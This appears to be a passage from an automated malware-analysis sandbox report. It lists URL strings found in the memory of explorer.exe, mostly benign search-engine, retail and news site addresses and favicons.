    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.de/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.es/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.in/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.it/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.interpark.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.nate.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.nifty.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.sify.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search.yam.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
    Source: explorer.exe, 00000008.00000000.1206028667.0000000007A37000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eas/sc/2b/a5ea21.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://suche.aol.de/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238355438.0000000005B00000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
    Source: 2B70BDA1-AACF-4F84-BA42-98BBBAFF03BA.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://web.ask.com/
    Source: explorer.exe, 00000008.00000002.1238355438.0000000005B00000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.com
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.de/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
    Source: explorer.exe, 00000008.00000000.1208945229.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.ask.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
    Source: explorer.exe, 00000008.00000000.1206028667.0000000007A37000.00000004.00000001.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
    Source: explorer.exe, 00000008.00000000.1208945229.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.docUrl.com/bar.htm
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
    Source: explorer.exe, 00000008.00000000.1208945229.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
    Source: explorer.exe, 00000008.00000000.1208945229.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
    Source: explorer.exe, 00000008.00000000.1208945229.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
    Source: explorer.exe, 00000008.00000000.1208945229.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
    Source: explorer.exe, 00000008.00000000.1208945229.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.in/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.br/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.cz/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.de/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.es/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.fr/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.it/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.pl/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.ru/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.google.si/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
    Source: explorer.exe, 00000008.00000000.1208945229.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
    Source: explorer.exe, 00000008.00000000.1207813455.0000000007D12000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
    Source: explorer.exe, 00000008.00000000.1207813455.0000000007D12000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp/
    Source: explorer.exe, 00000008.00000000.1207813455.0000000007D12000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-ch/?ocid=iehp
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.orange.fr/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
    Source: explorer.exe, 00000008.00000000.1208945229.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
    Source: explorer.exe, 00000008.00000000.1208945229.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
    Source: explorer.exe, 00000008.00000000.1208945229.000000000A8D6000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
    Source: explorer.exe, 00000008.00000002.1238720692.0000000005BF3000.00000002.00000001.sdmpString found in binary or memory: http://www.target.com/
